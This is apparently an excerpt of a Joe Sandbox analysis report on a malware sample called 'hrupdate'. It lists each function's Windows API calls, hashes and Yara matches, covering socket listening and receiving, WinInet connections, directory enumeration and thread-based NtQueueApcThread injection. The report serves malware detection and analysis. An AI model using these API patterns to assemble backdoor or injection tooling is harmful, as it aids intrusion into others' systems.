                                      control_flow_graph 785 469dc39-469dc56 786 469dc68-469dc6a 785->786 787 469dc58-469dc5d call 46aea1b 785->787 789 469dd81-469dd88 786->789 790 469dc70 786->790 791 469dc62-469dc63 787->791 792 469dc75-469dc79 790->792 791->786 793 469dc7f-469dc87 792->793 794 469dd76-469dd7b 792->794 795 469dc89-469dcc1 htonl recvfrom 793->795 796 469dcf6-469dd18 htonl ioctlsocket 793->796 794->789 794->792 797 469dcda-469dcdc 795->797 798 469dcc3-469dcce WSAGetLastError 795->798 799 469dd1a 796->799 800 469dd1d-469dd20 796->800 797->794 802 469dce2-469dcf4 797->802 798->794 801 469dcd4-469dcd8 798->801 799->800 803 469dd42-469dd43 800->803 804 469dd22-469dd26 800->804 805 469dd44-469dd56 call 4694495 801->805 806 469dd6b-469dd73 call 4694495 802->806 803->805 804->794 807 469dd28-469dd40 call 469d2bc 804->807 805->794 806->794 807->803 814 469dd58-469dd5d 807->814 814->794 815 469dd5f-469dd65 814->815 815->806
                                      APIs
                                      • _malloc.LIBCMT ref: 0469DC5D
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • htonl.WS2_32(046DAEF0), ref: 0469DC89
                                      • recvfrom.WS2_32(676494AD,046DAEF0,000FFFFC,00000000,?,?), ref: 0469DCB8
                                      • WSAGetLastError.WS2_32 ref: 0469DCC3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateErrorHeapLast_mallochtonlrecvfrom
                                      • String ID:
                                      • API String ID: 987280018-0
                                      • Opcode ID: 9678f4708aa8f24e2e711be6e40c1ab2691581d8444103db4c6e2821c5fe7046
                                      • Instruction ID: 01f2b1df015369b3283d40045574539d187f05ddd6b345b4d5f2d12a39358574
                                      • Opcode Fuzzy Hash: 9678f4708aa8f24e2e711be6e40c1ab2691581d8444103db4c6e2821c5fe7046
                                      • Instruction Fuzzy Hash: F741C3B1D00600EFEF258FA4D900A6A77F8EB50368F24426EE511A7290F3B4BD45DB40
                                      Function 00672DCF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                      Download Yara Rule
                                      APIs
                                      • _callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,006727F7,00000000,00000000,?,?,?,00000000), ref: 00672DD7
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,006727F7,00000000,00000000,?,?,?,00000000), ref: 00672DE4
                                      • _CxxThrowException.VCRUNTIME140(00000000,00674C5C,00000000), ref: 0067328C
                                      • _CxxThrowException.VCRUNTIME140(00000000,00674CB0,00000000), ref: 006732A9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896617863.0000000000671000.00000020.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                      • Associated: 00000000.00000002.3896582194.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896648026.0000000000674000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896669818.0000000000676000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000677000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.3896684082.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_670000_hrupdate.jbxd
                                      Similarity
                                      • API ID: ExceptionThrow$_callnewhmalloc
                                      • String ID: Unknown exception
                                      • API String ID: 4113974480-410509341
                                      • Opcode ID: cd49b769edc4c74584dfe839b8cba9176470a98ec606c253bbad09716d1efd83
                                      • Instruction ID: 1e53c79c9219640709cdc5fe8bdc074ae31b8e2b5b2e80a49cbcced4b7bed4e5
                                      • Opcode Fuzzy Hash: cd49b769edc4c74584dfe839b8cba9176470a98ec606c253bbad09716d1efd83
                                      • Instruction Fuzzy Hash: D4F0C83490021EB7CF14BAE4E85BA9D776E9E00310B60C168F92C96392FF71DB55A5D4
                                      Function 04697388 Relevance: 4.6, APIs: 3, Instructions: 68networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 046972DB: WSAStartup.WS2_32(00000202,?), ref: 046972FC
                                        • Part of subcall function 046972DB: WSACleanup.WS2_32 ref: 04697306
                                      • WSASocketA.WS2_32(00000002,00000002,00000000,00000000,00000000,00000000), ref: 046973AC
                                      • WSAIoctl.WS2_32(00000000,4004747F,00000000,00000000,?,000005F0,00000001,00000000,00000000), ref: 046973D7
                                      • closesocket.WS2_32(00000000), ref: 04697416
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CleanupIoctlSocketStartupclosesocket
                                      • String ID:
                                      • API String ID: 1100289767-0
                                      • Opcode ID: 730618842d4896ce921020d42c0e1c03074ff07817c521891b671c48d90ced2b
                                      • Instruction ID: 3360419639fd02b63694f65e7e31953374672c71655803faceed7fe17870fa97
                                      • Opcode Fuzzy Hash: 730618842d4896ce921020d42c0e1c03074ff07817c521891b671c48d90ced2b
                                      • Instruction Fuzzy Hash: 1511EB31710218BBEB208E65CC88FFB7FEDDF857A2F004025F609C2181F674AC418960
                                      Function 04696BC4 Relevance: 3.1, APIs: 2, Instructions: 54networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04696C21
                                      • InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04696C31
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOption
                                      • String ID:
                                      • API String ID: 3327645240-0
                                      • Opcode ID: 5af060adb2f272de5ac62e5b97abf5c66943b6c8e233d38e74597abaace99b30
                                      • Instruction ID: 0bebca4fc4591970bc3aff14af0dd80e62c7ea46811936b39983fe6565a4c026
                                      • Opcode Fuzzy Hash: 5af060adb2f272de5ac62e5b97abf5c66943b6c8e233d38e74597abaace99b30
                                      • Instruction Fuzzy Hash: 9F01DBA5A4176CF6EF316B60ED09FFA7A9CD711B54F400015B601DA1D0F6F4AE50A6D0
                                      Function 04699DA9 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset
                                      • String ID:
                                      • API String ID: 4137368368-0
                                      • Opcode ID: bd2c0968d70933de71f735b608e66aa7a97fb2dcebf71dbb3f572718e7a1dbbe
                                      • Instruction ID: 75f3e97fef6ad50c001969696916805ceb40f7ebd2cabb12e2da939dcc9739a3
                                      • Opcode Fuzzy Hash: bd2c0968d70933de71f735b608e66aa7a97fb2dcebf71dbb3f572718e7a1dbbe
                                      • Instruction Fuzzy Hash: FB016DB1A05A109FE720AFA4EC40B577BE8EF54759F00452EE84997340F779BC1A8F98
                                      Function 04696C3F Relevance: 3.0, APIs: 2, Instructions: 50networkCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 04696BC4: InternetSetOptionA.WININET(00000000,00000005,0003A980,00000004), ref: 04696C21
                                        • Part of subcall function 04696BC4: InternetSetOptionA.WININET(00000006,0003A980,00000004), ref: 04696C31
                                      • InternetSetOptionA.WININET(00000000,0000002B,00000000,00000000), ref: 04696CA1
                                      • InternetSetOptionA.WININET(0000002C,00000000,00000000), ref: 04696CBD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InternetOption
                                      • String ID:
                                      • API String ID: 3327645240-0
                                      • Opcode ID: 2353327cdd1e553b8b62b5f830da047a9a408e462482d77d8b9e5079140f11c4
                                      • Instruction ID: 65e8aa805e08870183f782c465055b4d025318735ab3e9fbf58133a8a3b731bf
                                      • Opcode Fuzzy Hash: 2353327cdd1e553b8b62b5f830da047a9a408e462482d77d8b9e5079140f11c4
                                      • Instruction Fuzzy Hash: 6A018B71A45754B6FF307B74AC05FA53B8DDB00768F10541AF900591C1FDB9EC909E98
                                      Function 00F3C085 Relevance: 3.0, APIs: 2, Instructions: 45memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapCreate.KERNEL32(00040000,00000000,00000000,?,00000004,?), ref: 00F3C0A3
                                      • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 00F3C0B8
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCreate
                                      • String ID:
                                      • API String ID: 2875408731-0
                                      • Opcode ID: a1d591106e10ad5d9a199ab925d8206d06663360d4494dab4b31c1a7f6544c4c
                                      • Instruction ID: bd44e0d39c3bb3f05f0b3ebeddbb53e393fec294f036436bc5199bfaa5c12aaa
                                      • Opcode Fuzzy Hash: a1d591106e10ad5d9a199ab925d8206d06663360d4494dab4b31c1a7f6544c4c
                                      • Instruction Fuzzy Hash: BC1143B8A00209AFDB04CF44D496B9ABBB1FB58354F1081A9ED089B391D771A995CFD0
                                      Function 0469DD89 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0469D902: htonl.WS2_32(0469489E), ref: 0469D93C
                                        • Part of subcall function 0469D902: select.WS2_32(00000000,?,?,?,?), ref: 0469D9A0
                                        • Part of subcall function 0469D902: __WSAFDIsSet.WS2_32(34E85900,?), ref: 0469D9BC
                                        • Part of subcall function 0469D902: accept.WS2_32(34E85900,00000000,00000000), ref: 0469D9D1
                                        • Part of subcall function 0469D902: ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 0469D9E4
                                      • GetTickCount.KERNEL32 ref: 0469DD97
                                        • Part of subcall function 0469DC39: _malloc.LIBCMT ref: 0469DC5D
                                        • Part of subcall function 0469DC39: htonl.WS2_32(046DAEF0), ref: 0469DC89
                                        • Part of subcall function 0469DC39: recvfrom.WS2_32(676494AD,046DAEF0,000FFFFC,00000000,?,?), ref: 0469DCB8
                                        • Part of subcall function 0469DC39: WSAGetLastError.WS2_32 ref: 0469DCC3
                                      • GetTickCount.KERNEL32 ref: 0469DDAA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CountTickhtonl$ErrorLast_mallocacceptioctlsocketrecvfromselect
                                      • String ID:
                                      • API String ID: 597769433-0
                                      • Opcode ID: cd64c52258221071affa8da24593c197c077184f0c2cff5cbf06565508432017
                                      • Instruction ID: ac565580b835b0a2d835fa41f08a982a2239b69f5f760debb7e7330aaeeb592a
                                      • Opcode Fuzzy Hash: cd64c52258221071affa8da24593c197c077184f0c2cff5cbf06565508432017
                                      • Instruction Fuzzy Hash: B2D0A982A1102809BB0037A5AC404AE4BCD8A824B8338003FE040C2200FEC8BC0647BA
                                      Function 046A6ECA Relevance: 1.8, APIs: 1, Instructions: 257COMMON
                                      Download Yara Rule
                                      APIs
                                      • _calloc.LIBCMT ref: 046A6F2C
                                        • Part of subcall function 046BCB50: __calloc_impl.LIBCMT ref: 046BCB65
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __calloc_impl_calloc
                                      • String ID:
                                      • API String ID: 2108883976-0
                                      • Opcode ID: 600ae0fb66e5a81b39ab67434c6ff557fde242639536df2de6a63d6d8bbdb05e
                                      • Instruction ID: 7f168a712908f7e21554c585a93a7d63fd0470b0228600db7448a274df0bbbd8
                                      • Opcode Fuzzy Hash: 600ae0fb66e5a81b39ab67434c6ff557fde242639536df2de6a63d6d8bbdb05e
                                      • Instruction Fuzzy Hash: C9A119B1900608EFDF259F94CC45EAEBBB6FF89300F104599E541AB250E772AD91DF60
                                      Function 00F3C365 Relevance: 1.6, APIs: 1, Instructions: 136libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryA.KERNEL32(?,?,?,?,?,?,00F3BCAB,AAAABBBB,?,?,?,?), ref: 00F3C3D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F30000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_3_f30000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 52b2a5cd8be6c39a7177695a6cfaf2b078eabeb2ff83b80fc3f6fd0b178b378e
                                      • Instruction ID: 1039fb296e5c883795e4866e251e5c07380bc9773e266b3fd723372186c408fd
                                      • Opcode Fuzzy Hash: 52b2a5cd8be6c39a7177695a6cfaf2b078eabeb2ff83b80fc3f6fd0b178b378e
                                      • Instruction Fuzzy Hash: B751EA75A0010ADFCF04CF98C890AAEB7B1FF88314F2481A9D915AB355D734AE51DF90
                                      Function 046957F4 Relevance: 1.6, APIs: 1, Instructions: 90networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectA.WININET(046DA658,?,?,00000000,00000000,00000003,00000000,046DA668), ref: 046958B5
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$ConnectInternet
                                      • String ID:
                                      • API String ID: 3195992531-0
                                      • Opcode ID: 47bb71635ee546373b5158b663072026b9da5b489052d683b770be4a61a873ec
                                      • Instruction ID: 4b079f4a1ab064be7a9a1ee773e556f1dd1b91c6805042ece113fc564a83ce29
                                      • Opcode Fuzzy Hash: 47bb71635ee546373b5158b663072026b9da5b489052d683b770be4a61a873ec
                                      • Instruction Fuzzy Hash: 3C116A92A032207AEB603EE25C49EE73ECCDF276E8F001424BA0D55182F4BD9D1483F5
                                      Function 0469F638 Relevance: 1.6, APIs: 1, Instructions: 76memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • HeapDestroy.KERNEL32(?), ref: 0469F6B2
                                        • Part of subcall function 046A15AD: _memset.LIBCMT ref: 046A15CD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DestroyHeap_memset
                                      • String ID:
                                      • API String ID: 3970643317-0
                                      • Opcode ID: bed628a4d13ad085a4afe248a82b35631558d55bd5cf806b867f8d6943affbbc
                                      • Instruction ID: 2feeb952a9fe68161ef0709712cbffe1777421043f9437f91dd1d1b01a0a9f56
                                      • Opcode Fuzzy Hash: bed628a4d13ad085a4afe248a82b35631558d55bd5cf806b867f8d6943affbbc
                                      • Instruction Fuzzy Hash: 9C11E731604304ABDF38AE249C44F7A33DCEB26724F260019FC04C52A1FAA5FD519A99
                                      Function 04695770 Relevance: 1.6, APIs: 1, Instructions: 62networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetOpenA.WININET(?,?,04694826,00000000,00000000), ref: 046957EB
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A048
                                        • Part of subcall function 0469A042: _malloc.LIBCMT ref: 0469A09F
                                        • Part of subcall function 04699F1A: _malloc.LIBCMT ref: 04699F5B
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699F6C
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 04699FB7
                                        • Part of subcall function 04699F1A: _memset.LIBCMT ref: 0469A00C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _malloc_memset$InternetOpen
                                      • String ID:
                                      • API String ID: 4223322473-0
                                      • Opcode ID: 3b7383c0a64973effe46d03d708316799d76624455a7010247f3b4afdc3d410c
                                      • Instruction ID: bc465f471f5d261f6b5d68f9f57fa09cacdbbbac6e68b66630c9dcb53c5d5edc
                                      • Opcode Fuzzy Hash: 3b7383c0a64973effe46d03d708316799d76624455a7010247f3b4afdc3d410c
                                      • Instruction Fuzzy Hash: 400184A25021647ADF613EA29C88CEB3EDCEF272F8B000018F90D85151F56A9D24C6F4
                                      Function 046AA0E8 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 046AA0EF
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocateHeap_malloc
                                      • String ID:
                                      • API String ID: 501242067-0
                                      • Opcode ID: ad8a498fba999602ffd9deb04c9b15af916676bd3c418e5468ca25e17563959e
                                      • Instruction ID: ea2744c67a1ae8dcd135511c495c51b794e48a67399bf2849dacbbae745107df
                                      • Opcode Fuzzy Hash: ad8a498fba999602ffd9deb04c9b15af916676bd3c418e5468ca25e17563959e
                                      • Instruction Fuzzy Hash: 94E0BF72208A019FE768CF6CF844616B7E1AB85734B24CE3FD09AD7794E634E8918B14
                                      Function 00B10B00 Relevance: 1.3, APIs: 1, Instructions: 31sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3896804996.0000000000B10000.00000020.00000800.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_b10000_hrupdate.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: bc9552c2b311404d09daf3ba76ae2ef43201ff9fdafa701454f815beffcc5e84
                                      • Instruction ID: 3ae39de76a14803aa33e4869a6e045b9adf91af7ce5611a8f7c32783169ca313
                                      • Opcode Fuzzy Hash: bc9552c2b311404d09daf3ba76ae2ef43201ff9fdafa701454f815beffcc5e84
                                      • Instruction Fuzzy Hash: 24F090B1914208EBDB04FF54E845AD6B7A9AB5034CF84C1A4F80E4F202C771EAC0CBC0
                                      Function 04699AAE Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(046D6318,00000000,0469498F), ref: 04699ACF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: 1280178566e06b75fd48ba5c24b2b841cb9c2f37d9457202bcf53a275211dca3
                                      • Instruction ID: 9ce966c649fda40707cd2451fd84485aa1f337625f46b0e74adb80589e3ab9c3
                                      • Opcode Fuzzy Hash: 1280178566e06b75fd48ba5c24b2b841cb9c2f37d9457202bcf53a275211dca3
                                      • Instruction Fuzzy Hash: 90D0A9D0000A0228EE086720A814B4B12CCCF21336B24000EF009C8B80FFA8EC898029

                                      Non-executed Functions

                                      Function 04699839 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 172filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0469984B
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • _memset.LIBCMT ref: 04699857
                                        • Part of subcall function 046958BF: _malloc.LIBCMT ref: 046958C5
                                        • Part of subcall function 0469590F: htonl.WS2_32(00000000), ref: 04695915
                                      • _strncmp.LIBCMT ref: 046998A6
                                      • GetCurrentDirectoryA.KERNEL32(00004000,00000000), ref: 046998B4
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      • FindFirstFileA.KERNEL32(00000000,?), ref: 046998E5
                                      • GetLastError.KERNEL32 ref: 046998F2
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0469993E
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 0469994E
                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 046999E1
                                      • FindClose.KERNEL32(00000000), ref: 046999F0
                                        • Part of subcall function 04695A19: _vwprintf.LIBCMT ref: 04695A23
                                        • Part of subcall function 04695A19: _vswprintf_s.LIBCMT ref: 04695A47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileFind$ErrorHeapLastSystem_malloc$AllocateCloseCurrentDirectoryFirstFreeLocalNextSpecific___sbh_find_block___sbh_free_block__lock_memset_strncmp_vswprintf_s_vwprintfhtonl
                                      • String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
                                      • API String ID: 2804257087-1754256099
                                      • Opcode ID: c980ae5e561b8d58e5e8802fbeaa0eda83f3dbeff68df0d1881a28f6b19b1702
                                      • Instruction ID: 18ec15d3394b0f4056e268e66a72c23b08c73e763daa23b0ecd0ab6753a6b93f
                                      • Opcode Fuzzy Hash: c980ae5e561b8d58e5e8802fbeaa0eda83f3dbeff68df0d1881a28f6b19b1702
                                      • Instruction Fuzzy Hash: E4511DB2D00129BAEF11EBE5DC45EFF77FCAF08715F04041AB605A1181FA79AE448B65
                                      Function 0469B1AE Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118threadsleepprocessCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(ntdll,NtQueueApcThread,0469AF20,00000000), ref: 0469B1F3
                                      • GetProcAddress.KERNEL32(00000000), ref: 0469B1FA
                                        • Part of subcall function 0469B122: _malloc.LIBCMT ref: 0469B141
                                      • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0469B229
                                      • Thread32First.KERNEL32(00000000,0000001C), ref: 0469B23E
                                      • Thread32Next.KERNEL32(00000000,0000001C), ref: 0469B286
                                      • Sleep.KERNEL32(000000C8,00000004,00000000), ref: 0469B29D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Thread32$AddressCreateFirstHandleModuleNextProcSleepSnapshotToolhelp32_malloc
                                      • String ID: NtQueueApcThread$ntdll
                                      • API String ID: 147937454-1374908105
                                      • Opcode ID: aea948428916e17b7c9a8048cc87b57a0d486cd9a1c300920fe39641eb1e0d30
                                      • Instruction ID: cedf0a0f4cc6afb152039b8725b1e495dc6160310a4a87791cd31e4492cbd302
                                      • Opcode Fuzzy Hash: aea948428916e17b7c9a8048cc87b57a0d486cd9a1c300920fe39641eb1e0d30
                                      • Instruction Fuzzy Hash: D2414CB2900209BFEF10EFA5D8859BEBBBDEB14704F104429EA0196240F6B1BE55CF65
                                      Function 0469F544 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 84fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • _malloc.LIBCMT ref: 0469F551
                                        • Part of subcall function 046AEA1B: __FF_MSGBANNER.LIBCMT ref: 046AEA3E
                                        • Part of subcall function 046AEA1B: __NMSG_WRITE.LIBCMT ref: 046AEA45
                                        • Part of subcall function 046AEA1B: RtlAllocateHeap.NTDLL(00000000,?), ref: 046AEA92
                                      • __snprintf.LIBCMT ref: 0469F562
                                      • FindFirstFileA.KERNEL32(00000000,046996DC,?,0469F633,046996DC,?,Function_0000565A), ref: 0469F56F
                                        • Part of subcall function 046AE93E: __lock.LIBCMT ref: 046AE95C
                                        • Part of subcall function 046AE93E: ___sbh_find_block.LIBCMT ref: 046AE967
                                        • Part of subcall function 046AE93E: ___sbh_free_block.LIBCMT ref: 046AE976
                                        • Part of subcall function 046AE93E: HeapFree.KERNEL32(00000000,?,046C95B0,0000000C,046B1056,00000000,046C9760,0000000C,046B1090,?,?,?,046BC35D,00000004,046C9A70,0000000C), ref: 046AE9A6
                                        • Part of subcall function 046AE93E: GetLastError.KERNEL32(?,046BC35D,00000004,046C9A70,0000000C,046B7A28,?,?,00000000,00000000,00000000,?,046B05CF,00000001,00000214), ref: 046AE9B7
                                      • _malloc.LIBCMT ref: 0469F5AE
                                      • __snprintf.LIBCMT ref: 0469F5C3
                                        • Part of subcall function 0469F507: _malloc.LIBCMT ref: 0469F512
                                        • Part of subcall function 0469F507: __snprintf.LIBCMT ref: 0469F526
                                      • FindNextFileA.KERNEL32(000000FF,046996DC,?,?,?,?,?,?,?), ref: 0469F5F0
                                      • FindClose.KERNEL32(000000FF,?,?,?,?,?,?,?), ref: 0469F5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, Offset: 04694000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_4694000_hrupdate.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Find__snprintf_malloc$FileHeap$AllocateCloseErrorFirstFreeLastNext___sbh_find_block___sbh_free_block__lock
                                      • String ID: %s\*
                                      • API String ID: 1254174322-766152087
                                      • Opcode ID: c622cf919be442eeb5601df4503eb4e3803a3a19ca408504157e91b9bc63f903
                                      • Instruction ID: 995a6217cd052b4a7d5744c4ce388edbd4496eaf28d8fd0822b88d9655297c2d
                                      • Opcode Fuzzy Hash: c622cf919be442eeb5601df4503eb4e3803a3a19ca408504157e91b9bc63f903
